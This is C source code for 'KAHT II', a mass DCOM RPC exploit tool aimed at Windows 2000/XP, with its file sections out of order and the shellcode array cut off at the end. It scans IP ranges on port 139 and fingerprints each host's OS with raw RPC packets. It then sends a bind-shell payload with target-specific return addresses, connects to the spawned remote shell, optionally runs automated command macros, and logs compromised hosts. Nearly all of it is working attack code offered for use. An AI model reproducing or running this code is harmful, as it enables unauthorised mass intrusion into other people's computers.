printf("\n NEW!: Macros Available in shell enviroment!!\n Type !! for more info into a shell.\n");
//printf(" If AUTOHACKING ENABLED MACRO !9 WILL BE EXECUTED\n");
exit(1);
}
/******************************************************************/
/*****************************************************************/
void execute_macro(char opt,int sock2){
FILE *macro;
char cadena[512];
char tmp[512];
int found=0;
int delay=500; //configurable TIMEOUT FOR CMDS - Default=500
if ((macro=fopen("macros.txt","r")) !=NULL)
{
while (!feof(macro))
{
memset(cadena,'\0',sizeof(cadena));
fgets(cadena,sizeof(cadena)-1,macro);
cadena[strlen(cadena)-1]='\0';
if ((found==1) && (( strncmp(cadena,"[Macro]",strlen("[Macro]"))) ==0) )
{
fclose(macro);
printf(" + Ejecucion de La Macro Terminada\n");
fclose(macro);return;}
if (( strncmp(cadena,"delay=",strlen("delay="))) ==0)
delay=atoi(cadena+6);
if (( strncmp(cadena,"key=",strlen("key="))) ==0)
if (( cadena+strlen("key=!"))[0]==opt)
found=1; //OUR CMDS ARE HERE! :)
if ( (( strncmp(cadena,"cmd=",strlen("cmd="))) ==0) && (found) )
if (strlen(cadena)>strlen("cmd= "))
{
strcpy(tmp,cadena+4);
strcat(tmp,"\r\n");
send(sock2,tmp,strlen(tmp),0);
//printf("Enviado: %s! de tamaƱo: %i\n",tmp,sizeof(tmp));
sleep(delay);
}
}
fclose(macro);
send(sock2,"\n",strlen("\n"),0);
printf(" - Macro Done -\n");
}
sleep(25);
}
/*****************************************************************/
void show_macros(int sock2){
FILE *macro;
char cadena[512];
printf(" +______________(Available Macros)______________\n");
if ((macro=fopen("macros.txt","r")) !=NULL)
{
while (!feof(macro))
{
memset(cadena,'\0',512);
fgets(cadena,sizeof(cadena)-1,macro);
if (strlen(cadena)>1)
{
cadena[strlen(cadena)-1]='\0';
if (( strncmp(cadena,"name=",strlen("name="))) ==0)
printf(" + Nombre: %s ",cadena+strlen("name="));
if ((strncmp(cadena,"key=",strlen("key="))) ==0)
printf("Trigger: %s\n",cadena+strlen("key="));
}
}
fclose(macro);
}
send(sock2,"\n",strlen("\n"),0);
sleep(10);
}
/*****************************************************************/
void macro(char opt, int sock2)
{
switch(opt)
{
case '!':
show_macros(sock2);
break;
default:
execute_macro(opt,sock2);
break;
}
}
/*****************************************************************/
void readconsole(void *sock2)
{
int l;
char buf[512];
if (AUTOHACKING) {
execute_macro('9',(int) sock2);
salir=1;
}
while(!salir)
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
salir=1;
else
{
if ( (l==3) && (buf[0]=='!') )
macro(buf[1],(int)sock2);
else
{
send((int)sock2,buf,l,0);
if (strncmp(buf,"exit",strlen("exit")) ==0)
{
salir=1;
_endthread();
}
}
}
}
}
void enviamacro(void *sock2)
{
sleep(500);
macro(9,(int)sock2);
salir=1;
_endthread();
}
/****************************************************************/
int shell (int sock2) /* NOT RIPPED FROM TESO :P */
{
int l;
char buf[512];
salir=0;
_beginthread(readconsole,4096,(void *)(int) sock2);
while (!salir)
{
if ((l=recv (sock2, buf, sizeof (buf),0))>0)
write (1, buf, l);
else sleep(100);
}
printf("\n - Connection Closed\n");
return (salir);
}
/*****************************************************************/
int main(int argc, char **argv)
{
int i,total=NTHREADS;
#ifdef WIN32
WSADATA ws;
clrscr();
#endif
banner();
if(argc<3)
usage();
#ifdef WIN32
if (WSAStartup(MAKEWORD(2,0),&ws)!=0)
{
printf(" WSAStartup Error: %d\n",WSAGetLastError());
exit(1);
}
#endif
sscanf (argv[1], "%d.%d.%d.%d", &ip1[0],&ip1[1],&ip1[2],&ip1[3]);
sscanf (argv[2], "%d.%d.%d.%d", &ip2[0],&ip2[1],&ip2[2],&ip2[3]);
for(i=0;i<4;i++)
{
if ( (ip1[i]>255) || (ip1[i]<0) ) usage();
if ( (ip2[i]>255) || (ip2[i]<0) ) usage();
}
if (argc==4) total=atoi(argv[3]);
if (argc==5) AUTOHACKING=atoi(argv[4]);
#ifdef WIN32
InitializeCriticalSection(&cs);
InitializeCriticalSection(&css);
InitializeCriticalSection(&cslog);
InitializeCriticalSection(&csshell);
#else
//Aqui meter los thread de linux :D y semaforos
#endif
//ULTRA FAST PORT SCANNER....
if ((results=fopen("results.txt","w"))==NULL) exit(0);
printf(" [+] Targets: %s-%s with %i Threads\n",argv[1],argv[2],total);
srand ( time(NULL) ); RPORT=INITRPORT;
printf(" [+] Attacking Port: %i. Remote Shell at port: %i\n",PORT,RPORT);
printf(" [+] Scan In Progress...\n");
for(i=0;i<total;i++)
#ifdef WIN32
_beginthread(checkea,8192,(void *)i);
#else
//Aqui meter los thread de linux :D y semaforos
#endif
while(threads>0)
sleep(100);
fclose(results);
printf("\n [+] Scan Finished. Found %i open ports\n",rpcopen);
return(0);
}
/****************************************************************************************/
//void attack(char *linea,int peta)
void attack(char *linea,int peta)
{
if (peta==-1) return;
// if (AUTOHACKING!=1)
#ifdef WIN32
struct timeval tv;
#else
struct time_t tv;
#endif
struct sockaddr_in target_ip;
int sock,sock2; //Exploit Socket && Shell Socket
unsigned short port = 139;
unsigned short lportl=666; /* drg */
char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
unsigned char buf1[0x1000];
u_long tmp=1; //TIMEOUTS
FILE *w2k;
FILE *wxp;
int i;
fd_set fds;
//linea[strlen(linea-1)]='\0';
EnterCriticalSection(&csshell);
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(linea);
target_ip.sin_port = htons(port);
if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
{
printf(" - Connecting to %s\n",linea);
tmp=1;
ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));
//if((i=select(sock+1,0,&fds,0,&tv))!=SOCKET_ERROR)
// if (i!=0)
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
printf(" Sending Exploit to a %s Server...",targets[peta].os);
tmp=0;
ioctlsocket( sock, FIONBIO, &tmp);
if (send(sock,bindstr,sizeof(bindstr),0)>0)
{
tmp=1;
ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = RECV;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
if(select(sock +1, &fds, NULL, NULL, &tv) > 0)
{
recv(sock, buf1, 1000, 0);
lportl=htons(RPORT);
memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&winshellcode[1351],&lport,4);
memcpy(winshellcode+916, (unsigned char *) &targets[peta].ret, 4);
tmp=0;
ioctlsocket( sock, FIONBIO, &tmp);
send(sock,winshellcode,1705,0);
sleep(50);
if ((sock2=socket(AF_INET,SOCK_STREAM,0)) !=-1)
{
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(linea);
target_ip.sin_port = htons(RPORT);
tmp=1;
ioctlsocket( sock2, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock2, &fds);
connect(sock2,(struct sockaddr *)&target_ip, sizeof(target_ip));
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
printf("\n - Conectando con la Shell Remota...\n\n");
salir=0;
shell(sock2);
#ifdef WIN32
closesocket(sock2);
#else
close(sock2);
#endif
strcat(linea,"\n");
if (peta==0)
{
w2k=fopen("win2k.txt","a");
if (w2k!=NULL)
{ fputs(linea,w2k); fclose(w2k);}
else printf(" !!UNABLE TO LOG IP %s",linea);
}
else
{
wxp=fopen("winxp.txt","a");
if (wxp!=NULL)
{fputs(linea,wxp); fclose(wxp);}
else printf(" !!UNABLE TO LOG IP %s",linea);
}
//} else printf("UNABLE TO CONNECT TO SHELL\n");
} else printf("FAILED\n");
}
else printf("\n UNABLE TO CREATE SOCK2\n");
}
else printf(" FAILED to send Exploit2\n");
}
else printf(" FAILED to send Exploit\n");
}
}
//if (AUTOHACKING!=1)
LeaveCriticalSection(&csshell);
}
/*********************************************************************************/
char *givemeip(char *ip)
{
EnterCriticalSection(&cs);
if (ip1[3]!=254)
ip1[3]++;
else
{
ip1[2]++;
ip1[3]=1;
//return(NULL); //uhh!
}
if (ip1[2]==255)
{ ip1[2]++; ip1[1]++;}
LeaveCriticalSection(&cs);
if (ip1[2]>ip2[2]) return(NULL);
if (ip1[2]==ip2[2])
if (ip1[3]>ip2[3]) return(NULL);
sprintf(ip,"%d.%d.%d.%d",ip1[0],ip1[1],ip1[2],ip1[3]);
return(ip);
}
/******************************************************************************/
//int version(char *ip, int sock)
int version(char ip[16], int sock)
{
//sacado por ingenieria inversa del Scanner de ISS.
unsigned char peer0_0[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00 };
unsigned char peer0_1[] = {
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x07, 0x00 };
/*
unsigned char win2kvuln[] = {
0x04, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00};
*/
fd_set fds2;
unsigned char buf[1024];
int l;
struct timeval tv2;
FD_ZERO(&fds2);
FD_SET(sock, &fds2);
tv2.tv_sec = RPC_FINGERPRINT_TIMEOUT;
tv2.tv_usec = 0;
memset(buf,'\0',sizeof(buf));
send(sock,peer0_0,sizeof(peer0_0),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
l=recv (sock, buf, sizeof (buf),0);
// for(i=0;i<52;i++)
// {
// if (i==28) i=i+4;
// if (buf[i+32]!=win2kvuln[i])
// {
send(sock,peer0_1,sizeof(peer0_1),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
memset(buf,'\0',sizeof(buf));
l=recv (sock, buf, sizeof (buf),0);
if (l==32)
{
closesocket(sock);
return(1);//winxp
}
else
{
#ifdef WIN32
closesocket(sock);
#else
close(sock);
#endif
return(0);//Unknown
}
}
else return(-1);
// }
//}
// closesocket(sock);
// return(0);//win2k
}
closesocket(sock);
return(-1); //Unknown
}
/********************************************************************************/
void checkea(void *threadn)
{
char ip[16];
char ip2[17];
int sock,i;
struct sockaddr_in target_ip;
fd_set fds;
u_long tmp=1;
struct timeval tv;
EnterCriticalSection(&css);
threads++;
sleep(1);
LeaveCriticalSection(&css);
memset(ip,'\0',sizeof(ip));
while (givemeip(ip)!=NULL)
{
//printf("Checkeando IP: %s\n",ip);
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(ip);
target_ip.sin_port = htons(139);
closesocket(sock);
if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
{
tmp=1;
ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));
//if((i=select(sock+1,0,&fds,0,&tv))==SOCKET_ERROR) { }
//if((i=select(sock+1,0,&fds,0,&tv))==SOCKET_ERROR) { }
// else if (i==0) {
// printf("i==0 ip: %s\n",ip); }
// else
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
sprintf(ip2,"%s\n",ip);
EnterCriticalSection(&cslog);
fputs(ip2,results);
rpcopen++;
LeaveCriticalSection(&cslog);
attack(ip,version(ip,sock));
}
}
closesocket(sock);
memset(ip,'\0',sizeof(ip));
}
EnterCriticalSection(&css);
threads--;
sleep(1);
LeaveCriticalSection(&css);
//printf("Thread %i saliendo\n",(int)threadn);
_endthread();
}
/******************************************************************************/
__________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
REALLY PRIVATE VERSION (BETA 11) - AUTOHACKING
Ported to Linux by Croulder croulder[at]croulder.com
__________________________________________________
*/
#include <stdio.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include <unistd.h>
#include <windows.h>
#include <process.h>
#include <winsock2.h>
#include <tcconio.h>
#pragma comment (lib,"ws2_32.lib")
#else
#include <pthread.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#endif
#define MAX_THREADS 512
#define NTHREADS 50
#define PORT 139
#define CONNECT 6 //Connect Timeout
#define RECV 5 //recv Timeout
#define ATTACKTIMEOUT 5 //
#define RPC_FINGERPRINT_TIMEOUT 6 //rpc fingerprint
#define INITRPORT (rand()/2)+32767
//#define INITRPORT 53 //PORT TO SPAWN A SHELL
int RPORT,salir=0,AUTOHACKING=0,threads=0,rpcopen=0;
int ip1[4],ip2[4];
FILE *results; //results.txt ips con el puerto 139 abierto :D
#ifndef WIN32
#define CRITICAL_SECTION pthread_t
#endif
CRITICAL_SECTION cs,css,cslog,csshell; //Givemeip CS, number of threads, ipstologfile,shell()
//Ultra Fast port Scanner
char *givemeip(char *ip);
void checkea(void *threadn);
//Macro Functions..
void show_macros(int sock2);
void execute_macro(char opt,int sock2);
void macro(char opt, int sock2);
//Exploit Code...
void attack(char *linea,int peta);
int shell (int sock2);
void readconsole(void *sock2);
//me
void banner(void);
// remote Install
int InstallRemoteServiceNbt (char *ip);
int InstallRemoteServiceFtp (char *ip);
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char winshellcode[]=
"\x05\x00\x00\x03\x10\x00\x00\x00\xa8\x06\x00\x00\xe5\x00\x00\x00"
"\x90\x06\x00\x00\x01\x00\x04\x00\x05\x00\x06\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x32\x24\x58\xfd\xcc\x45\x64\x49\xb0\x70\xdd\xae"
"\x74\x2c\x96\xd2\x60\x5e\x0d\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x70\x5e\x0d\x00\x02\x00\x00\x00\x7c\x5e\x0d\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x80\x96\xf1\xf1\x2a\x4d\xce\x11\xa6\x6a\x00\x20"
"\xaf\x6e\x72\xf4\x0c\x00\x00\x00\x4d\x41\x52\x42\x01\x00\x00\x00"
"\x00\x00\x00\x00\x0d\xf0\xad\xba\x00\x00\x00\x00\xa8\xf4\x0b\x00"
"\x20\x06\x00\x00\x20\x06\x00\x00\x4d\x45\x4f\x57\x04\x00\x00\x00"
"\xa2\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
"\x38\x03\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
"\x00\x00\x00\x00\xf0\x05\x00\x00\xe8\x05\x00\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\xc8\x00\x00\x00\x4d\x45\x4f\x57"
"\xe8\x05\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
"\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xc4\x28\xcd\x00\x64\x29\xcd\x00\x00\x00\x00\x00"
"\x07\x00\x00\x00\xb9\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xab\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa5\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa6\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa4\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xad\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xaa\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\x07\x00\x00\x00\x60\x00\x00\x00\x58\x00\x00\x00"
"\x90\x00\x00\x00\x40\x00\x00\x00\x20\x00\x00\x00\x38\x03\x00\x00"
"\x30\x00\x00\x00\x01\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x50\x00\x00\x00\x4f\xb6\x88\x20\xff\xff\xff\xff\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x48\x00\x00\x00\x07\x00\x66\x00\x06\x09\x02\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x10\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x78\x19\x0c\x00"
"\x58\x00\x00\x00\x05\x00\x06\x00\x01\x00\x00\x00\x70\xd8\x98\x93"
"\x98\x4f\xd2\x11\xa9\x3d\xbe\x57\xb2\x00\x00\x00\x32\x00\x31\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x80\x00\x00\x00\x0d\xf0\xad\xba"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x18\x43\x14\x00\x00\x00\x00\x00\x60\x00\x00\x00\x60\x00\x00\x00"
"\x4d\x45\x4f\x57\x04\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x3b\x03\x00\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x30\x00\x00\x00"
"\x01\x00\x01\x00\x81\xc5\x17\x03\x80\x0e\xe9\x4a\x99\x99\xf1\x8a"
"\x50\x6f\x7a\x85\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x30\x00\x00\x00\x78\x00\x6e\x00"
"\x00\x00\x00\x00\xd8\xda\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x20\x2f\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x03\x00\x00\x00\x46\x00\x58\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x10\x00\x00\x00\x30\x00\x2e\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x68\x00\x00\x00\x0e\x00\xff\xff"
"\x68\x8b\x0b\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x86\x01\x00\x00\x00\x00\x00\x00\x86\x01\x00\x00\x5c\x00\x5c\x00"
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x9f\x75\x18\x00\xcc\xe0\xfd\x7f\xcc\xe0\xfd\x7f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\x40\xa1\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04\x00\x5c\x00\x43\x00"
"\x24\x00\x5c\x00\x31\x00\x32\x00\x33\x00\x34\x00\x35\x00\x36\x00"
"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00"
"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x2e\x00"
"\x64\x00\x6f\x00\x63\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x20\x00\x00\x00\x30\x00\x2d\x00\x00\x00\x00\x00\x88\x2a\x0c\x00"
